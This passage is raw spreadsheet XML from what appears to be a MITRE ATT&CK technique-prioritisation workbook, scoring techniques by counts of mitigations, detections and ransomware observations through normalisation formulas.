      </c>
      <c r="S33" s="51">
        <v>1</v>
      </c>
      <c r="T33" s="52" t="s">
        <v>216</v>
      </c>
      <c r="U33" s="51">
        <v>3</v>
      </c>
      <c r="V33" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W33">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X33">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y33">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z33">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA33">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB33">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC33" s="29" t="s">
        <v>217</v>
      </c>
      <c r="AD33" s="25" t="str" cm="1">
        <f t="array" ref="AD33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE33" s="25">
        <f>IF(AD33="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF33" s="25" t="str" cm="1">
        <f t="array" ref="AF33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG33" s="25">
        <f>IF(AF33="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH33" s="25" t="str" cm="1">
        <f t="array" ref="AH33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI33" s="25">
        <f>IF(AH33="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ33" s="25" t="str" cm="1">
        <f t="array" ref="AJ33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC33)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK33" s="25">
        <f>IF(AJ33="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL33" s="25" t="str" cm="1">
        <f t="array" ref="AL33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC33)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM33" s="25">
        <f>IF(AL33="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN33" s="52">
        <v>0</v>
      </c>
      <c r="AO33" s="51">
        <v>0</v>
      </c>
      <c r="AP33" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.1946646653333335E-2</v>
      </c>
      <c r="AQ33" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23982215551111111</v>
      </c>
      <c r="AR33" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23982215551111111</v>
      </c>
      <c r="AS33" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT33" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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4" spans="1:47" ht="32.1">
      <c r="A34" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.3516760551428571</v>
      </c>
      <c r="B34" s="25">
        <f>SUM(H34,M34,V34)*(1+SUM(AE34,AG34,AI34,AK34,AM34))</f>
        <v>0.51676055142857136</v>
      </c>
      <c r="C34" s="25" t="s">
        <v>218</v>
      </c>
      <c r="D34" s="25" t="s">
        <v>219</v>
      </c>
      <c r="E34" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F34" s="51">
        <v>1</v>
      </c>
      <c r="G34" s="51">
        <v>0</v>
      </c>
      <c r="H34" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I34">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J34">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K34">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L34">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M34" s="44">
        <v>0.19533197999999999</v>
      </c>
      <c r="N34" s="51">
        <v>0</v>
      </c>
      <c r="O34" s="51">
        <v>1</v>
      </c>
      <c r="P34" s="51">
        <v>2</v>
      </c>
      <c r="Q34" s="51">
        <v>8</v>
      </c>
      <c r="R34" s="52" t="s">
        <v>220</v>
      </c>
      <c r="S34" s="51">
        <v>10</v>
      </c>
      <c r="T34" s="52" t="s">
        <v>221</v>
      </c>
      <c r="U34" s="51">
        <v>13</v>
      </c>
      <c r="V34" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27142857142857141</v>
      </c>
      <c r="W34">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X34">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y34">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z34">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA34">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB34">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC34" s="29" t="s">
        <v>222</v>
      </c>
      <c r="AD34" s="25" t="str" cm="1">
        <f t="array" ref="AD34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC34)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE34" s="25">
        <f>IF(AD34="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF34" s="25" t="str" cm="1">
        <f t="array" ref="AF34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC34)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG34" s="25">
        <f>IF(AF34="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH34" s="25" t="str" cm="1">
        <f t="array" ref="AH34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC34)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI34" s="25">
        <f>IF(AH34="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ34" s="25" t="str" cm="1">
        <f t="array" ref="AJ34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC34)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK34" s="25">
        <f>IF(AJ34="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL34" s="25" t="str" cm="1">
        <f t="array" ref="AL34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC34)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM34" s="25">
        <f>IF(AL34="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN34" s="60">
        <v>9</v>
      </c>
      <c r="AO34" s="51">
        <v>1</v>
      </c>
      <c r="AP34" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.3516760551428571</v>
      </c>
      <c r="AQ34" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17225351714285711</v>
      </c>
      <c r="AR34" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17225351714285711</v>
      </c>
      <c r="AS34" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.42857142857142855</v>
      </c>
      <c r="AT34" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.42857142857142855</v>
      </c>
      <c r="AU3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5" spans="1:47" ht="48">
      <c r="A35" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9170356999999997E-2</v>
      </c>
      <c r="B35" s="25">
        <f>SUM(H35,M35,V35)*(1+SUM(AE35,AG35,AI35,AK35,AM35))</f>
        <v>0.45837023666666671</v>
      </c>
      <c r="C35" s="25" t="s">
        <v>223</v>
      </c>
      <c r="D35" s="25" t="s">
        <v>224</v>
      </c>
      <c r="E35" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F35" s="51">
        <v>1</v>
      </c>
      <c r="G35" s="51">
        <v>1</v>
      </c>
      <c r="H35" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I35">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J35">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K35">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L35">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M35" s="44">
        <v>0.19170356999999999</v>
      </c>
      <c r="N35" s="51">
        <v>0</v>
      </c>
      <c r="O35" s="51">
        <v>1</v>
      </c>
      <c r="P35" s="51">
        <v>0</v>
      </c>
      <c r="Q35" s="51">
        <v>0</v>
      </c>
      <c r="R35" s="52" t="s">
        <v>225</v>
      </c>
      <c r="S35" s="51">
        <v>7</v>
      </c>
      <c r="T35" s="51" t="s">
        <v>226</v>
      </c>
      <c r="U35" s="51">
        <v>10</v>
      </c>
      <c r="V35" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16666666666666669</v>
      </c>
      <c r="W35">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X35">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y35">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z35">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA35">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB35">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC35" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD35" s="25" t="str" cm="1">
        <f t="array" ref="AD35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE35" s="25">
        <f>IF(AD35="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF35" s="25" t="str" cm="1">
        <f t="array" ref="AF35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC35)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG35" s="25">
        <f>IF(AF35="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH35" s="25" t="str" cm="1">
        <f t="array" ref="AH35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI35" s="25">
        <f>IF(AH35="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ35" s="25" t="str" cm="1">
        <f t="array" ref="AJ35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK35" s="25">
        <f>IF(AJ35="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL35" s="25" t="str" cm="1">
        <f t="array" ref="AL35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM35" s="25">
        <f>IF(AL35="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN35" s="52">
        <v>1</v>
      </c>
      <c r="AO35" s="51">
        <v>1</v>
      </c>
      <c r="AP35" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9170356999999997E-2</v>
      </c>
      <c r="AQ35" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1527900788888889</v>
      </c>
      <c r="AR35" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1527900788888889</v>
      </c>
      <c r="AS35" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT35" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU3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6" spans="1:47" ht="48">
      <c r="A36" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14051737932</v>
      </c>
      <c r="B36" s="25">
        <f>SUM(H36,M36,V36)*(1+SUM(AE36,AG36,AI36,AK36,AM36))</f>
        <v>0.73850712653333328</v>
      </c>
      <c r="C36" s="25" t="s">
        <v>227</v>
      </c>
      <c r="D36" s="25" t="s">
        <v>228</v>
      </c>
      <c r="E36" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F36" s="51">
        <v>2</v>
      </c>
      <c r="G36" s="51">
        <v>5</v>
      </c>
      <c r="H36" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I36">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J36">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K36">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L36">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M36" s="44">
        <v>0.12907804</v>
      </c>
      <c r="N36" s="51">
        <v>3</v>
      </c>
      <c r="O36" s="51">
        <v>11</v>
      </c>
      <c r="P36" s="51">
        <v>1</v>
      </c>
      <c r="Q36" s="51">
        <v>1</v>
      </c>
      <c r="R36" s="51"/>
      <c r="S36" s="51">
        <v>0</v>
      </c>
      <c r="T36" s="51"/>
      <c r="U36" s="51">
        <v>0</v>
      </c>
      <c r="V36" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W36">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X36">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y36">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z36">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA36">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB36">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC36" s="29" t="s">
        <v>229</v>
      </c>
      <c r="AD36" s="25" t="str" cm="1">
        <f t="array" ref="AD36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC36)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE36" s="25">
        <f>IF(AD36="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF36" s="25" t="str" cm="1">
        <f t="array" ref="AF36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC36)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG36" s="25">
        <f>IF(AF36="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH36" s="25" t="str" cm="1">
        <f t="array" ref="AH36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC36)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI36" s="25">
        <f>IF(AH36="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ36" s="25" t="str" cm="1">
        <f t="array" ref="AJ36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC36)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK36" s="25">
        <f>IF(AJ36="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL36" s="25" t="str" cm="1">
        <f t="array" ref="AL36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC36)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM36" s="25">
        <f>IF(AL36="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN36" s="61">
        <v>2</v>
      </c>
      <c r="AO36" s="51">
        <v>1</v>
      </c>
      <c r="AP36" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14051737932</v>
      </c>
      <c r="AQ36" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.24616904217777777</v>
      </c>
      <c r="AR36" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.24616904217777777</v>
      </c>
      <c r="AS36" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT36" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU3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7" spans="1:47">
      <c r="A37" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29789018892895236</v>
      </c>
      <c r="B37" s="25">
        <f>SUM(H37,M37,V37)*(1+SUM(AE37,AG37,AI37,AK37,AM37))</f>
        <v>0.31223522262285719</v>
      </c>
      <c r="C37" s="25" t="s">
        <v>230</v>
      </c>
      <c r="D37" s="25" t="s">
        <v>231</v>
      </c>
      <c r="E37" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F37" s="51">
        <v>1</v>
      </c>
      <c r="G37" s="51">
        <v>1</v>
      </c>
      <c r="H37" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I37">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J37">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K37">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L37">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M37" s="44">
        <v>0.11777326</v>
      </c>
      <c r="N37" s="51">
        <v>2</v>
      </c>
      <c r="O37" s="51">
        <v>3</v>
      </c>
      <c r="P37" s="51">
        <v>2</v>
      </c>
      <c r="Q37" s="51">
        <v>2</v>
      </c>
      <c r="R37" s="51"/>
      <c r="S37" s="51">
        <v>0</v>
      </c>
      <c r="T37" s="51"/>
      <c r="U37" s="51">
        <v>0</v>
      </c>
      <c r="V37" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W37">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X37">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y37">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z37">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA37">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB37">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC37" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD37" s="25" t="str" cm="1">
        <f t="array" ref="AD37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC37)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE37" s="25">
        <f>IF(AD37="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF37" s="25" t="str" cm="1">
        <f t="array" ref="AF37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG37" s="25">
